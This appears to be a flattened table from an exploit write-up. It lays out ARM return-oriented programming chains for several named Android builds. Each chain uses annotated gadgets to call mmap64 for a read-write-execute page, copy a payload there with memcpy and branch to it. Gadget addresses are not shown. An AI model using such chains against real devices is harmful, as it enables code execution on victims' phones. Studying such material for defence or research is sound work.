lrx value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 address hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r7, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 lmy-1 value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 address hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r7, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 lmy-2 value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 address hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy 
(less 0x20) pop {r1, r2, r6, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r6) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 shamu / LYZ28E value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 address hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r6, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r6) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 shamu / LYZ28J value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 address hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r6, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r6) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 sm-g900v / OE1 value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 address hint (none) mmap64 
length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r7, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0